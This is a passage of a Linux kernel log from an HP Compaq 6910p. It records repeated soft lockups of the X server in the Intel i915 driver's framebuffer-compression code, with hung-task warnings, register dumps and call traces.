20:37:11 grainlead-lx kernel: [&lt;c105e1f7&gt;] ? enqueue_hrtimer+0x67/0xd0 Jan 9 20:37:11 grainlead-lx kernel: [&lt;c10f1649&gt;] ? vfs_ioctl+0x89/0xa0 Jan 9 20:37:11 grainlead-lx kernel: [&lt;c10f17c9&gt;] ? do_vfs_ioctl+0x79/0x5c0 Jan 9 20:37:11 grainlead-lx kernel: [&lt;c105f1a0&gt;] ? hrtimer_start+0x20/0x30 Jan 9 20:37:11 grainlead-lx kernel: [&lt;c1044772&gt;] ? do_setitimer+0x162/0x1f0 Jan 9 20:37:11 grainlead-lx kernel: [&lt;c1064a80&gt;] ? ktime_get_ts+0xd0/0x100 Jan 9 20:37:11 grainlead-lx kernel: [&lt;c10f1d86&gt;] ? sys_ioctl+0x76/0x90 Jan 9 20:37:11 grainlead-lx kernel: [&lt;c10039f3&gt;] ? sysenter_do_call+0x12/0x28 Jan 9 20:37:19 grainlead-lx kernel: INFO: task i915/1:70 blocked for more than 120 seconds. Jan 9 20:37:19 grainlead-lx kernel: "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. Jan 9 20:37:19 grainlead-lx kernel: i915/1 D 00000207 0 70 2 0x00000000 Jan 9 20:37:19 grainlead-lx kernel: f7092180 00000046 00000002 00000207 eb9fa5b0 eb9fa5b0 f7092180 43b7f029 Jan 9 20:37:19 grainlead-lx kernel: 00000df4 c28082e0 ebbf3c00 c14472a0 c14472a0 43b7e647 00000df4 f7092330 Jan 9 20:37:19 grainlead-lx kernel: c1442764 f7092330 c14472a0 c14472a0 c2a03800 00000002 f6887f4c f6887f48 Jan 9 20:37:19 grainlead-lx kernel: Call Trace: Jan 9 20:37:19 grainlead-lx kernel: [&lt;c12b7dea&gt;] ? __mutex_lock_slowpath+0x10a/0x2c0 Jan 9 20:37:19 grainlead-lx kernel: [&lt;c12b7fa8&gt;] ? mutex_lock+0x8/0x20 Jan 9 20:37:19 grainlead-lx kernel: [&lt;f824310a&gt;] ? i915_gem_retire_work_handler+0x2a/0x80 [i915] Jan 9 20:37:19 grainlead-lx kernel: [&lt;f82430e0&gt;] ? i915_gem_retire_work_handler+0x0/0x80 [i915] Jan 9 20:37:19 grainlead-lx kernel: [&lt;c1056fdf&gt;] ? worker_thread+0x11f/0x260 Jan 9 20:37:19 grainlead-lx kernel: [&lt;c105ae50&gt;] ? autoremove_wake_function+0x0/0x40 Jan 9 20:37:19 grainlead-lx kernel: [&lt;c1056ec0&gt;] ? worker_thread+0x0/0x260 Jan 9 20:37:19 grainlead-lx kernel: [&lt;c105aba4&gt;] ? kthread+0x74/0x80 Jan 9 20:37:19 grainlead-lx kernel: [&lt;c105ab30&gt;] ? kthread+0x0/0x80 Jan 9 20:37:19 grainlead-lx kernel: [&lt;c1004627&gt;] ? kernel_thread_helper+0x7/0x10 Jan 9 20:38:17 grainlead-lx kernel: BUG: soft lockup - CPU#0 stuck for 61s! [X:5209] Jan 9 20:38:17 grainlead-lx kernel: Modules linked in: nls_cp437 vfat fat aes_i586 aes_generic ipv6 ext2 ide_cs ide_core arc4 snd_seq_dummy snd_hda_codec_analog snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ecb joydev ppdev parport_pc fan snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon sdhci_pci sdhci iwl3945 irtty_sir snd_pcm snd_timer hp_accel mmc_core firewire_ohci firewire_core crc_itu_t tpm tpm_bios yenta_socket rsrc_nonstatic container snd soundcore psmouse lis3lv02d input_polldev sir_dev ricoh_mmc iTCO_wdt iTCO_vendor_support lp iwlagn iwlcore snd_page_alloc wmi usb_storage battery irda crc_ccitt parport ac sg thermal serio_raw btusb bluetooth mac80211 led_class evdev e1000e cfg80211 rfkill cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart uhci_hcd ehci_hcd usbcore ata_piix ahci pata_pcmcia libata scsi_mod pcmcia pcmcia_core Jan 9 20:38:17 grainlead-lx kernel: Jan 9 20:38:17 grainlead-lx kernel: Pid: 5209, comm: X Not tainted (2.6.32-ARCH #1) HP Compaq 6910p (GX978UC#ACJ) Jan 9 20:38:17 grainlead-lx kernel: EIP: 0060:[&lt;f8252121&gt;] EFLAGS: 00203286 CPU: 0 Jan 9 20:38:17 grainlead-lx kernel: EIP is at i8xx_disable_fbc+0x231/0x270 [i915] Jan 9 20:38:17 grainlead-lx kernel: EAX: f68b1800 EBX: f8680000 ECX: f68ac000 EDX: a0000142 Jan 9 20:38:17 grainlead-lx kernel: ESI: 00071008 EDI: f68ac000 EBP: 00071180 ESP: f0429d84 Jan 9 20:38:17 grainlead-lx kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jan 9 20:38:17 grainlead-lx kernel: CR0: 8005003b CR2: b7793000 CR3: 365aa000 CR4: 000006d0 Jan 9 20:38:17 grainlead-lx kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jan 9 20:38:17 grainlead-lx kernel: DR6: ffff0ff0 DR7: 00000400 Jan 9 20:38:17 grainlead-lx kernel: Call Trace: Jan 9 20:38:17 grainlead-lx kernel: [&lt;f8252914&gt;] ? i9xx_crtc_dpms+0x3a4/0x410 [i915] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f82529ab&gt;] ? intel_crtc_dpms+0x2b/0x100 [i915] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f8258567&gt;] ? intel_lvds_set_power+0xd7/0xf0 [i915] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f8131fd4&gt;] ? drm_helper_connector_dpms+0x144/0x260 [drm_kms_helper] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f8258580&gt;] ? intel_lvds_dpms+0x0/0x20 [i915] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f8180d19&gt;] ? drm_mode_object_find+0x49/0x70 [drm] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f81810cb&gt;] ? drm_mode_connector_property_set_ioctl+0x1eb/0x1f0 [drm] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f818128f&gt;] ? drm_mode_getproperty_ioctl+0x13f/0x2e0 [drm] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f81762b8&gt;] ? drm_ioctl+0x158/0x320 [drm] Jan 9 20:38:17 grainlead-lx kernel: [&lt;f8180ee0&gt;] ? drm_mode_connector_property_set_ioctl+0x0/0x1f0 [drm] Jan 9 20:38:17 grainlead-lx kernel: [&lt;c105e1f7&gt;] ? enqueue_hrtimer+0x67/0xd0 Jan 9 20:38:17 grainlead-lx kernel: [&lt;c10f1649&gt;] ? vfs_ioctl+0x89/0xa0 Jan 9 20:38:17 grainlead-lx kernel: [&lt;c10f17c9&gt;] ? do_vfs_ioctl+0x79/0x5c0 Jan 9 20:38:17 grainlead-lx kernel: [&lt;c105f1a0&gt;] ? hrtimer_start+0x20/0x30 Jan 9 20:38:17 grainlead-lx kernel: [&lt;c1044772&gt;] ? do_setitimer+0x162/0x1f0 Jan 9 20:38:17 grainlead-lx kernel: [&lt;c1064a80&gt;] ? ktime_get_ts+0xd0/0x100 Jan 9 20:38:17 grainlead-lx kernel: [&lt;c10f1d86&gt;] ? sys_ioctl+0x76/0x90 Jan 9 20:38:17 grainlead-lx kernel: [&lt;c10039f3&gt;] ? sysenter_do_call+0x12/0x28 Jan 9 20:39:19 grainlead-lx kernel: INFO: task i915/1:70 blocked for more than 120 seconds. Jan 9 20:39:19 grainlead-lx kernel: "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. Jan 9 20:39:19 grainlead-lx kernel: i915/1 D 00000207 0 70 2 0x00000000 Jan 9 20:39:19 grainlead-lx kernel: f7092180 00000046 00000002 00000207 eb9fa5b0 eb9fa5b0 f7092180 43b7f029 Jan 9 20:39:19 grainlead-lx kernel: 00000df4 c28082e0 ebbf3c00 c14472a0 c14472a0 43b7e647 00000df4 f7092330 Jan 9 20:39:19 grainlead-lx kernel: c1442764 f7092330 c14472a0 c14472a0 c2a03800 00000002 f6887f4c f6887f48 Jan 9 20:39:19 grainlead-lx kernel: Call Trace: Jan 9 20:39:19 grainlead-lx kernel: [&lt;c12b7dea&gt;] ? __mutex_lock_slowpath+0x10a/0x2c0 Jan 9 20:39:19 grainlead-lx kernel: [&lt;c12b7fa8&gt;] ? mutex_lock+0x8/0x20 Jan 9 20:39:19 grainlead-lx kernel: [&lt;f824310a&gt;] ? i915_gem_retire_work_handler+0x2a/0x80 [i915] Jan 9 20:39:19 grainlead-lx kernel: [&lt;f82430e0&gt;] ? i915_gem_retire_work_handler+0x0/0x80 [i915] Jan 9 20:39:19 grainlead-lx kernel: [&lt;c1056fdf&gt;] ? worker_thread+0x11f/0x260 Jan 9 20:39:19 grainlead-lx kernel: [&lt;c105ae50&gt;] ? autoremove_wake_function+0x0/0x40 Jan 9 20:39:19 grainlead-lx kernel: [&lt;c1056ec0&gt;] ? worker_thread+0x0/0x260 Jan 9 20:39:19 grainlead-lx kernel: [&lt;c105aba4&gt;] ? kthread+0x74/0x80 Jan 9 20:39:19 grainlead-lx kernel: [&lt;c105ab30&gt;] ? kthread+0x0/0x80 Jan 9 20:39:19 grainlead-lx kernel: [&lt;c1004627&gt;] ? kernel_thread_helper+0x7/0x10 Jan 9 20:39:22 grainlead-lx kernel: BUG: soft lockup - CPU#0 stuck for 61s! [X:5209] Jan 9 20:39:22 grainlead-lx kernel: Modules linked in: nls_cp437 vfat fat aes_i586 aes_generic ipv6 ext2 ide_cs ide_core arc4 snd_seq_dummy snd_hda_codec_analog snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ecb joydev ppdev parport_pc fan snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon sdhci_pci sdhci iwl3945 irtty_sir snd_pcm snd_timer hp_accel mmc_core firewire_ohci firewire_core crc_itu_t tpm tpm_bios yenta_socket rsrc_nonstatic container snd soundcore psmouse lis3lv02d input_polldev sir_dev ricoh_mmc iTCO_wdt iTCO_vendor_support lp iwlagn iwlcore snd_page_alloc wmi usb_storage battery irda crc_ccitt parport ac sg thermal serio_raw btusb bluetooth mac80211 led_class evdev e1000e cfg80211 rfkill cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart uhci_hcd ehci_hcd usbcore ata_piix ahci pata_pcmcia libata scsi_mod pcmcia pcmcia_core Jan 9 20:39:22 grainlead-lx kernel: Jan 9 20:39:22 grainlead-lx kernel: Pid: 5209, comm: X Not tainted (2.6.32-ARCH #1) HP Compaq 6910p (GX978UC#ACJ) Jan 9 20:39:22 grainlead-lx kernel: EIP: 0060:[&lt;f8252121&gt;] EFLAGS: 00203286 CPU: 0 Jan 9 20:39:22 grainlead-lx kernel: EIP is at i8xx_disable_fbc+0x231/0x270 [i915] Jan 9 20:39:22 grainlead-lx kernel: EAX: f68b1800 EBX: f8680000 ECX: f68ac000 EDX: a0000142 Jan 9 20:39:22 grainlead-lx kernel: ESI: 00071008 EDI: f68ac000 EBP: 00071180 ESP: f0429d84 Jan 9 20:39:22 grainlead-lx kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jan 9 20:39:22 grainlead-lx kernel: CR0: 8005003b CR2: b7793000 CR3: 365aa000 CR4: 000006d0 Jan 9 20:39:22 grainlead-lx kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jan 9 20:39:22 grainlead-lx kernel: DR6: ffff0ff0 DR7: 00000400 Jan 9 20:39:22 grainlead-lx kernel: Call Trace: Jan 9 20:39:22 grainlead-lx kernel: [&lt;f8252914&gt;] ? i9xx_crtc_dpms+0x3a4/0x410 [i915] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f82529ab&gt;] ? intel_crtc_dpms+0x2b/0x100 [i915] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f8258567&gt;] ? intel_lvds_set_power+0xd7/0xf0 [i915] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f8131fd4&gt;] ? drm_helper_connector_dpms+0x144/0x260 [drm_kms_helper] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f8258580&gt;] ? intel_lvds_dpms+0x0/0x20 [i915] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f8180d19&gt;] ? drm_mode_object_find+0x49/0x70 [drm] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f81810cb&gt;] ? drm_mode_connector_property_set_ioctl+0x1eb/0x1f0 [drm] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f818128f&gt;] ? drm_mode_getproperty_ioctl+0x13f/0x2e0 [drm] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f81762b8&gt;] ? drm_ioctl+0x158/0x320 [drm] Jan 9 20:39:22 grainlead-lx kernel: [&lt;f8180ee0&gt;] ? drm_mode_connector_property_set_ioctl+0x0/0x1f0 [drm] Jan 9 20:39:22 grainlead-lx kernel: [&lt;c105e1f7&gt;] ? enqueue_hrtimer+0x67/0xd0 Jan 9 20:39:22 grainlead-lx kernel: [&lt;c10f1649&gt;] ? vfs_ioctl+0x89/0xa0 Jan 9 20:39:22 grainlead-lx kernel: [&lt;c10f17c9&gt;] ? do_vfs_ioctl+0x79/0x5c0 Jan 9 20:39:22 grainlead-lx kernel: [&lt;c105f1a0&gt;] ? hrtimer_start+0x20/0x30 Jan 9 20:39:22 grainlead-lx kernel: [&lt;c1044772&gt;] ? do_setitimer+0x162/0x1f0 Jan 9 20:39:22 grainlead-lx kernel: [&lt;c1064a80&gt;] ? ktime_get_ts+0xd0/0x100 Jan 9 20:39:22 grainlead-lx kernel: [&lt;c10f1d86&gt;] ? sys_ioctl+0x76/0x90 Jan 9 20:39:22 grainlead-lx kernel: [&lt;c10039f3&gt;] ? sysenter_do_call+0x12/0x28 Jan 9 20:40:28 grainlead-lx kernel: BUG: soft lockup - CPU#0 stuck for 61s! [X:5209] Jan 9 20:40:28 grainlead-lx kernel: Modules linked in: nls_cp437 vfat fat aes_i586 aes_generic ipv6 ext2 ide_cs ide_core arc4 snd_seq_dummy snd_hda_codec_analog snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ecb joydev ppdev parport_pc fan snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon sdhci_pci sdhci iwl3945 irtty_sir snd_pcm snd_timer hp_accel mmc_core firewire_ohci firewire_core crc_itu_t tpm tpm_bios yenta_socket rsrc_nonstatic container snd soundcore psmouse lis3lv02d input_polldev sir_dev ricoh_mmc iTCO_wdt iTCO_vendor_support lp iwlagn iwlcore snd_page_alloc wmi usb_storage battery irda crc_ccitt parport ac sg thermal serio_raw btusb bluetooth mac80211 led_class evdev e1000e cfg80211 rfkill cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart uhci_hcd ehci_hcd usbcore ata_piix ahci pata_pcmcia libata scsi_mod pcmcia pcmcia_core Jan 9 20:40:28 grainlead-lx kernel: Jan 9 20:40:28 grainlead-lx kernel: Pid: 5209, comm: X Not tainted (2.6.32-ARCH #1) HP Compaq 6910p (GX978UC#ACJ) Jan 9 20:40:28 grainlead-lx kernel: EIP: 0060:[&lt;f8252121&gt;] EFLAGS: 00203286 CPU: 0 Jan 9 20:40:28 grainlead-lx kernel: EIP is at i8xx_disable_fbc+0x231/0x270 [i915] Jan 9 20:40:28 grainlead-lx kernel: EAX: f68b1800 EBX: f8680000 ECX: f68ac000 EDX: a0000142 Jan 9 20:40:28 grainlead-lx kernel: ESI: 00071008 EDI: f68ac000 EBP: 00071180 ESP: f0429d84 Jan 9 20:40:28 grainlead-lx kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jan 9 20:40:28 grainlead-lx kernel: CR0: 8005003b CR2: b7793000 CR3: 365aa000 CR4: 000006d0 Jan 9 20:40:28 grainlead-lx kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jan 9 20:40:28 grainlead-lx kernel: DR6: ffff0ff0 DR7: 00000400 Jan 9 20:40:28 grainlead-lx kernel: Call Trace: Jan 9 20:40:28 grainlead-lx kernel: [&lt;f8252914&gt;] ? i9xx_crtc_dpms+0x3a4/0x410 [i915] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f82529ab&gt;] ? intel_crtc_dpms+0x2b/0x100 [i915] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f8258567&gt;] ? intel_lvds_set_power+0xd7/0xf0 [i915] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f8131fd4&gt;] ? drm_helper_connector_dpms+0x144/0x260 [drm_kms_helper] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f8258580&gt;] ? intel_lvds_dpms+0x0/0x20 [i915] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f8180d19&gt;] ? drm_mode_object_find+0x49/0x70 [drm] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f81810cb&gt;] ? drm_mode_connector_property_set_ioctl+0x1eb/0x1f0 [drm] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f818128f&gt;] ? drm_mode_getproperty_ioctl+0x13f/0x2e0 [drm] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f81762b8&gt;] ? drm_ioctl+0x158/0x320 [drm] Jan 9 20:40:28 grainlead-lx kernel: [&lt;f8180ee0&gt;] ? drm_mode_connector_property_set_ioctl+0x0/0x1f0 [drm] Jan 9 20:40:28 grainlead-lx kernel: [&lt;c105e1f7&gt;] ? enqueue_hrtimer+0x67/0xd0 Jan 9 20:40:28 grainlead-lx kernel: [&lt;c10f1649&gt;] ? vfs_ioctl+0x89/0xa0 Jan 9 20:40:28 grainlead-lx kernel: [&lt;c10f17c9&gt;] ? do_vfs_ioctl+0x79/0x5c0 Jan 9 20:40:28 grainlead-lx kernel: [&lt;c105f1a0&gt;] ? hrtimer_start+0x20/0x30 Jan 9 20:40:28 grainlead-lx kernel: [&lt;c1044772&gt;] ? do_setitimer+0x162/0x1f0 Jan 9 20:40:28 grainlead-lx kernel: [&lt;c1064a80&gt;] ? ktime_get_ts+0xd0/0x100 Jan 9 20:40:28 grainlead-lx kernel: [&lt;c10f1d86&gt;] ? sys_ioctl+0x76/0x90 Jan 9 20:40:28 grainlead-lx kernel: [&lt;c10039f3&gt;] ? sysenter_do_call+0x12/0x28 Jan 9 20:41:19 grainlead-lx kernel: INFO: task i915/1:70 blocked for more than 120 seconds. Jan 9 20:41:19 grainlead-lx kernel: "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. Jan 9 20:41:19 grainlead-lx kernel: i915/1 D 00000207 0 70 2 0x00000000 Jan 9 20:41:19 grainlead-lx kernel: f7092180 00000046 00000002 00000207 eb9fa5b0 eb9fa5b0 f7092180 43b7f029 Jan 9 20:41:19 grainlead-lx kernel: 00000df4 c28082e0 ebbf3c00 c14472a0 c14472a0 43b7e647 00000df4 f7092330 Jan 9 20:41:19 grainlead-lx kernel: c1442764 f7092330 c14472a0 c14472a0 c2a03800 00000002 f6887f4c f6887f48 Jan 9 20:41:19 grainlead-lx kernel: Call Trace: Jan 9 20:41:19 grainlead-lx kernel: [&lt;c12b7dea&gt;] ? __mutex_lock_slowpath+0x10a/0x2c0 Jan 9 20:41:19 grainlead-lx kernel: [&lt;c12b7fa8&gt;] ? mutex_lock+0x8/0x20 Jan 9 20:41:19 grainlead-lx kernel: [&lt;f824310a&gt;] ? i915_gem_retire_work_handler+0x2a/0x80 [i915] Jan 9 20:41:19 grainlead-lx kernel: [&lt;f82430e0&gt;] ? i915_gem_retire_work_handler+0x0/0x80 [i915] Jan 9 20:41:19 grainlead-lx kernel: [&lt;c1056fdf&gt;] ? worker_thread+0x11f/0x260 Jan 9 20:41:19 grainlead-lx kernel: [&lt;c105ae50&gt;] ? autoremove_wake_function+0x0/0x40 Jan 9 20:41:19 grainlead-lx kernel: [&lt;c1056ec0&gt;] ? worker_thread+0x0/0x260 Jan 9 20:41:19 grainlead-lx kernel: [&lt;c105aba4&gt;] ? kthread+0x74/0x80 Jan 9 20:41:19 grainlead-lx kernel: [&lt;c105ab30&gt;] ? kthread+0x0/0x80 Jan 9 20:41:19 grainlead-lx kernel: [&lt;c1004627&gt;] ? kernel_thread_helper+0x7/0x10 Jan 9 20:41:33 grainlead-lx kernel: BUG: soft lockup - CPU#0 stuck for 61s! [X:5209] Jan 9 20:41:33 grainlead-lx kernel: Modules linked in: nls_cp437 vfat fat aes_i586 aes_generic ipv6 ext2 ide_cs ide_core arc4 snd_seq_dummy snd_hda_codec_analog snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ecb joydev ppdev parport_pc fan snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon sdhci_pci sdhci iwl3945 irtty_sir snd_pcm snd_timer hp_accel mmc_core firewire_ohci firewire_core crc_itu_t tpm tpm_bios yenta_socket rsrc_nonstatic container snd soundcore psmouse lis3lv02d input_polldev sir_dev ricoh_mmc iTCO_wdt iTCO_vendor_support lp iwlagn iwlcore snd_page_alloc wmi usb_storage battery irda crc_ccitt parport ac sg thermal serio_raw btusb bluetooth mac80211 led_class evdev e1000e cfg80211 rfkill cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart uhci_hcd ehci_hcd usbcore ata_piix ahci pata_pcmcia libata scsi_mod pcmcia pcmcia_core Jan 9 20:41:33 grainlead-lx kernel: Jan 9 20:41:33 grainlead-lx kernel: Pid: 5209, comm: X Not tainted (2.6.32-ARCH #1) HP Compaq 6910p (GX978UC#ACJ) Jan 9 20:41:33 grainlead-lx kernel: EIP: 0060:[&lt;f8252121&gt;] EFLAGS: 00203286 CPU: 0 Jan 9 20:41:33 grainlead-lx kernel: EIP is at i8xx_disable_fbc+0x231/0x270 [i915] Jan 9 20:41:33 grainlead-lx kernel: EAX: f68b1800 EBX: f8680000 ECX: f68ac000 EDX: a0000142 Jan 9 20:41:33 grainlead-lx kernel: ESI: 00071008 EDI: f68ac000 EBP: 00071180 ESP: f0429d84 Jan 9 20:41:33 grainlead-lx kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jan 9 20:41:33 grainlead-lx kernel: CR0: 8005003b CR2: b7793000 CR3: 365aa000 CR4: 000006d0 Jan 9 20:41:33 grainlead-lx kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jan 9 20:41:33 grainlead-lx kernel: DR6: ffff0ff0 DR7: 00000400 Jan 9 20:41:33 grainlead-lx kernel: Call Trace: Jan 9 20:41:33 grainlead-lx kernel: [&lt;f8252914&gt;] ? i9xx_crtc_dpms+0x3a4/0x410 [i915] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f82529ab&gt;] ? intel_crtc_dpms+0x2b/0x100 [i915] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f8258567&gt;] ? intel_lvds_set_power+0xd7/0xf0 [i915] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f8131fd4&gt;] ? drm_helper_connector_dpms+0x144/0x260 [drm_kms_helper] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f8258580&gt;] ? intel_lvds_dpms+0x0/0x20 [i915] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f8180d19&gt;] ? drm_mode_object_find+0x49/0x70 [drm] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f81810cb&gt;] ? drm_mode_connector_property_set_ioctl+0x1eb/0x1f0 [drm] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f818128f&gt;] ? drm_mode_getproperty_ioctl+0x13f/0x2e0 [drm] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f81762b8&gt;] ? drm_ioctl+0x158/0x320 [drm] Jan 9 20:41:33 grainlead-lx kernel: [&lt;f8180ee0&gt;] ? drm_mode_connector_property_set_ioctl+0x0/0x1f0 [drm] Jan 9 20:41:33 grainlead-lx kernel: [&lt;c105e1f7&gt;] ? enqueue_hrtimer+0x67/0xd0 Jan 9 20:41:33 grainlead-lx kernel: [&lt;c10f1649&gt;] ? vfs_ioctl+0x89/0xa0 Jan 9 20:41:33 grainlead-lx kernel: [&lt;c10f17c9&gt;] ? do_vfs_ioctl+0x79/0x5c0 Jan 9 20:41:33 grainlead-lx kernel: [&lt;c105f1a0&gt;] ? hrtimer_start+0x20/0x30 Jan 9 20:41:33 grainlead-lx kernel: [&lt;c1044772&gt;] ? do_setitimer+0x162/0x1f0 Jan 9 20:41:33 grainlead-lx kernel: [&lt;c1064a80&gt;] ? ktime_get_ts+0xd0/0x100 Jan 9 20:41:33 grainlead-lx kernel: [&lt;c10f1d86&gt;] ? sys_ioctl+0x76/0x90 Jan 9 20:41:33 grainlead-lx kernel: [&lt;c10039f3&gt;] ? sysenter_do_call+0x12/0x28 Jan 9 20:42:39 grainlead-lx kernel: BUG: soft lockup - CPU#0 stuck for 61s! [X:5209] Jan 9 20:42:39 grainlead-lx kernel: Modules linked in: nls_cp437 vfat fat aes_i586 aes_generic ipv6 ext2 ide_cs ide_core arc4 snd_seq_dummy snd_hda_codec_analog snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ecb joydev ppdev parport_pc fan snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon sdhci_pci sdhci iwl3945 irtty_sir snd_pcm snd_timer hp_accel mmc_core firewire_ohci firewire_core crc_itu_t tpm tpm_bios yenta_socket rsrc_nonstatic container snd soundcore psmouse lis3lv02d input_polldev sir_dev ricoh_mmc iTCO_wdt iTCO_vendor_support lp iwlagn iwlcore snd_page_alloc wmi usb_storage battery irda crc_ccitt parport ac sg thermal serio_raw btusb bluetooth mac80211 led_class evdev e1000e cfg80211 rfkill cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart uhci_hcd ehci_hcd usbcore ata_piix ahci pata_pcmcia libata scsi_mod pcmcia pcmcia_core Jan 9 20:42:39 grainlead-lx kernel: Jan 9 20:42:39 grainlead-lx kernel: Pid: 5209, comm: X Not tainted (2.6.32-ARCH #1) HP Compaq 6910p (GX978UC#ACJ) Jan 9 20:42:39 grainlead-lx kernel: EIP: 0060:[&lt;f8252121&gt;] EFLAGS: 00203286 CPU: 0 Jan 9 20:42:39 grainlead-lx kernel: EIP is at i8xx_disable_fbc+0x231/0x270 [i915] Jan 9 20:42:39 grainlead-lx kernel: EAX: f68b1800 EBX: f8680000 ECX: f68ac000 EDX: a0000142 Jan 9 20:42:39 grainlead-lx kernel: ESI: 00071008 EDI: f68ac000 EBP: 00071180 ESP: f0429d84 Jan 9 20:42:39 grainlead-lx kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jan 9 20:42:39 grainlead-lx kernel: CR0: 8005003b CR2: b7793000 CR3: 365aa000 CR4: 000006d0 Jan 9 20:42:39 grainlead-lx kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jan 9 20:42:39 grainlead-lx kernel: DR6: ffff0ff0 DR7: 00000400 Jan 9 20:42:39 grainlead-lx kernel: Call Trace: Jan 9 20:42:39 grainlead-lx kernel: [&lt;f8252914&gt;] ? i9xx_crtc_dpms+0x3a4/0x410 [i915] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f82529ab&gt;] ? intel_crtc_dpms+0x2b/0x100 [i915] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f8258567&gt;] ? intel_lvds_set_power+0xd7/0xf0 [i915] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f8131fd4&gt;] ? drm_helper_connector_dpms+0x144/0x260 [drm_kms_helper] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f8258580&gt;] ? intel_lvds_dpms+0x0/0x20 [i915] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f8180d19&gt;] ? drm_mode_object_find+0x49/0x70 [drm] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f81810cb&gt;] ? drm_mode_connector_property_set_ioctl+0x1eb/0x1f0 [drm] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f818128f&gt;] ? drm_mode_getproperty_ioctl+0x13f/0x2e0 [drm] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f81762b8&gt;] ? drm_ioctl+0x158/0x320 [drm] Jan 9 20:42:39 grainlead-lx kernel: [&lt;f8180ee0&gt;] ? drm_mode_connector_property_set_ioctl+0x0/0x1f0 [drm] Jan 9 20:42:39 grainlead-lx kernel: [&lt;c105e1f7&gt;] ? enqueue_hrtimer+0x67/0xd0 Jan 9 20:42:39 grainlead-lx kernel: [&lt;c10f1649&gt;] ? vfs_ioctl+0x89/0xa0 Jan 9 20:42:39 grainlead-lx kernel: [&lt;c10f17c9&gt;] ? do_vfs_ioctl+0x79/0x5c0 Jan 9 20:42:39 grainlead-lx kernel: [&lt;c105f1a0&gt;] ? hrtimer_start+0x20/0x30 